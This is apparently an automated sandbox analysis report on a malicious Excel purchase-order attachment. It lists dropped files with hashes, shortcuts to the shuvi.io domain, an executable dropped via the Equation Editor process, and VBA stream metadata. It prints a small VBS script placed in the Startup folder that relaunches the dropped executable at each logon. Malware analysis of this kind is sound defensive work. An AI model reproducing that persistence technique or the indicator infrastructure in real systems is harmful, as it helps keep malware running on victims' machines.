SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF2F9DC4D2772FBCE.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.179892081675338
Encrypted:	false
SSDEEP:	12:DCYv0BeLTZ/n/Ry4/32RcU5t6pg6xR+h:7aeLTZQ4/ecd9C
MD5:	028184A607BC6A66C424D5BEADDFB56E
SHA1:	335A00BE21C2CF596706B91A55A26460DA309B19
SHA-256:	FC0437FE8F31D63FBF5A7D8EAD45E97C5A21211B645FA2F2F247648996738FEF
SHA-512:	799647FEE5A5124DF90DBB8F5B6065A6A20FBF34792577C26588E4C1DA449ED4CFED26DF677C545BF9497BA3DF1FB3908AE2C4A474A0DF282F724ABD4A007F9A
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\directory\name.exe

Download File

Process:	C:\Users\user\AppData\Roaming\taskhostw.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290752
Entropy (8bit):	7.269682117155447
Encrypted:	false
SSDEEP:	24576:WCdxte/80jYLT3U1jfsWaNuPcgCOCYdVtL/JAc/RhmTO/wQ:fw80cTsjkWaNecFOCYDljmyL
MD5:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
SHA1:	F4A663D69419E1CDEF4D31AE003C89F6C19F23C0
SHA-256:	D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
SHA-512:	9A2141A4F2AADD4613F665CCFF25E1BE5EC4B31716F2F56982220032E688A860E28C0783626DF885ECA8F120C0C7C088B1E28438FAA6F0A1C3125BA760F8BB09
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...c(.g..........".................J.............@.......................... .......N....@...@.......@.....................L...\|....p..<(......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...<(...p...*..................@..@.reloc..0q.......r...@..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\7al0eY.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<https://shuvi.io/7al0eY>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.680537650016895
Encrypted:	false
SSDEEP:	3:HRAbABGQYm2f4vMKKSEivn:HRYFVm44vM9iv
MD5:	EB7E0FAAC0470CFD79B312A14B843989
SHA1:	439864192FF20CA77FA7B43B072ACEF57F988D0F
SHA-256:	BDA5A620F3D6D1616D4E0D466BD170C0A50F1C5480885B0484B0779AB805E9BC
SHA-512:	717ADE39F988CFE2A73A90C23F43037ADC10B22360C5D86DB3A766FD9226A46D88D10AD199C8514ABE56B80B49B83F90A73C0B657F317723198BDE988123C33A
Malicious:	true
Preview:	[InternetShortcut]..URL=https://shuvi.io/7al0eY..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [xls]
Category:	modified
Size (bytes):	92
Entropy (8bit):	4.6174304636438
Encrypted:	false
SSDEEP:	3:bDD/GXKLJdIbScOLprSmMtbScOLprSv:bfGXQJdIbSlpotbSlpI
MD5:	AC9A6D12D1DD27090FA08E666CFFFD13
SHA1:	35B011B39144CD196744199A1DAAD08A73445E45
SHA-256:	DD3219A94741DAFAB22010302DA30618348B370EC2B765AFD45E66440FC1590A
SHA-512:	CC8AC6CBDBB4DBF04CD09A5F8528A7D7C459B1394F58427F8A1FEAE7C586771AA293B85C1E282A326CDDFFF32CD8EB968153562B46E87FB05A313D1C9FF2D29E
Malicious:	false
Preview:	[folders]..7al0eY.url=0..shuvi.io.url=0..PO-00006799868.LNK=0..[xls]..PO-00006799868.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\shuvi.io.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<https://shuvi.io/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	43
Entropy (8bit):	4.425810103338053
Encrypted:	false
SSDEEP:	3:HRAbABGQYm2f4vMKKy:HRYFVm44vMA
MD5:	060F03B948441809C5912A838AF7DAD7
SHA1:	92D284BA3BDB97B52A7C996101192D678133DD25
SHA-256:	FAD63F404C5030F148CF8C96367AE4590265EEA6ACB0C5D944D0C665DE0C575E
SHA-512:	D2DC43BF860F172DE080C66AA2417D6E99348DAF1A1D6EE5DFB7965E1990A9D2BB18D9F0272295D79328CC3FBE2FC5FD32FBB7AE9272CC3288AE25AF0A84BEB8
Malicious:	true
Preview:	[InternetShortcut]..URL=https://shuvi.io/..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyn5bGa/uWxCiWXhlllln:vdsCkWtib9/PhSdl
MD5:	1BF7D217D8EE7C7A29943959D1D47B61
SHA1:	A70BEE6CD9AD6550D00223C6255D45E60AACB23E
SHA-256:	AA58A5C81D40DF3D595D132FB33B003CD754D13B19624B1008807C803D89BFFE
SHA-512:	47D0F3270189629CA6499973854FC7F00A1843891C9D82B9C5AB95BE455A079D3990C1D2CCA8E3B3A102E10146FB118EDD44B58A7B7701D5A0B88A4E66200FFD
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	268
Entropy (8bit):	3.432515153875934
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcltr1UEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlZ1Q1A1z4mA2n
MD5:	56B963F73C0E43390FF3FF4D7A017676
SHA1:	3B13AC1CF25CDDF48309FC03DAE0C21E501BE72D
SHA-256:	894FD00EC8DF7058794232AEEB64467BC91FE4009F18FA1407E09E92444A9EE0
SHA-512:	38D55BAD2C2EB6C764D036238AC2E220B9444C98F41857799C2316B25AC8BB6C4500E43D362DFFFDF7583858D7C553CF2F11D38962F0BBEC7618B6FA6C71F9F8
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

C:\Users\user\AppData\Roaming\taskhostw.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290752
Entropy (8bit):	7.269682117155447
Encrypted:	false
SSDEEP:	24576:WCdxte/80jYLT3U1jfsWaNuPcgCOCYdVtL/JAc/RhmTO/wQ:fw80cTsjkWaNecFOCYDljmyL
MD5:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
SHA1:	F4A663D69419E1CDEF4D31AE003C89F6C19F23C0
SHA-256:	D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
SHA-512:	9A2141A4F2AADD4613F665CCFF25E1BE5EC4B31716F2F56982220032E688A860E28C0783626DF885ECA8F120C0C7C088B1E28438FAA6F0A1C3125BA760F8BB09
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...c(.g..........".................J.............@.......................... .......N....@...@.......@.....................L...\|....p..<(......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...<(...p...*..................@..@.reloc..0q.......r...@..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\68730000

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sat Oct 12 15:40:15 2024, Security: 1
Category:	dropped
Size (bytes):	1101824
Entropy (8bit):	7.299868576453754
Encrypted:	false
SSDEEP:	12288:xmzHJEHAfwu4hnD3DERnLRmF8DNRrf1T3dCduCVltqMEV+qA/FtYCZt1gF2gSk:gLw/hnbARM8/B3WV/qzoHdHF
MD5:	671C8C03CD14C8E905CBE2AD01B69DB4
SHA1:	C49221E5EAA1FF64301935B7C6530DC4139CFE70
SHA-256:	96372300B4C77CCA71146360FCC6E3B556B842CC485785F918041B37062F347D
SHA-512:	96F499EBFF46255B6123D5835A8267DC60E00141FB3F54D6579865E6BBEA8ED315C6B468805B8668A46D2D06F0D09E7168EA8DEE2F5BE5A9CB8A2593D24C49D0
Malicious:	false
Preview:	......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\68730000:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\PO-00006799868.xls (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sat Oct 12 15:40:15 2024, Security: 1
Category:	dropped
Size (bytes):	1101824
Entropy (8bit):	7.299868576453754
Encrypted:	false
SSDEEP:	12288:xmzHJEHAfwu4hnD3DERnLRmF8DNRrf1T3dCduCVltqMEV+qA/FtYCZt1gF2gSk:gLw/hnbARM8/B3WV/qzoHdHF
MD5:	671C8C03CD14C8E905CBE2AD01B69DB4
SHA1:	C49221E5EAA1FF64301935B7C6530DC4139CFE70
SHA-256:	96372300B4C77CCA71146360FCC6E3B556B842CC485785F918041B37062F347D
SHA-512:	96F499EBFF46255B6123D5835A8267DC60E00141FB3F54D6579865E6BBEA8ED315C6B468805B8668A46D2D06F0D09E7168EA8DEE2F5BE5A9CB8A2593D24C49D0
Malicious:	true
Preview:	......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 10 12:40:54 2024, Security: 1
Entropy (8bit):	7.26432946204488
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	PO-00006799868.xls
File size:	1'094'656 bytes
MD5:	e78662c0ecb1a705f3f16366cff45409
SHA1:	0de40063c9028a33b77d4cb3de06dec0f705059b
SHA256:	33c790e2db3f22fbd80c43a82837b5fb7a0f4a317b25dbab1e984baf95fa82bc
SHA512:	21a144950245cfeb4c616ab3e15889a04811839d3b0a288193678ee8bf6ba14c2ce81fc67c57d57d4a20e1e3b9ae06f88009437de435ab0380f55689805432c4
SSDEEP:	12288:ZmzHJEHAfwu4heD3DERnLRmF8DLPrf1H3dzFuFBAn0aIGZf12e5wyowAkiR9GnOp:4Lw/hebARM8Th3OA5qgq3/pp
TLSH:	A135CE83EA1D4F62CE41423466F7173A17249C43D622832F22F5772839FBAD06956FAD
File Content Preview:	........................>...............................................................................<.......................i.......k......................................................................................................................

File Icon


Icon Hash:	276ea3a6a6b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "PO-00006799868.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-10-10 11:40:54
Creating Application:	Microsoft Excel
Security:	1

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I f " . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 49 66 f2 22 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I f . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 49 66 8f a2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I f ] Y . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 49 66 5d 59 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I f . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 49 66 a0 87 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.250350317504982
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . ' C . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD0043CF7E/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD0043CF7E/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0043CF7E/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	MBD0043CF7E/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.701136490257069
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

Stream Path: MBD0043CF7E/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", Stream Size: 90976

General
Stream Path:	MBD0043CF7E/\x5SummaryInformation
CLSID:
File Type:	dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
Stream Size:	90976
Entropy:	1.885975041684416
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00

Stream Path: MBD0043CF7E/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	MBD0043CF7E/MBD0018D4CE/\x1Ole
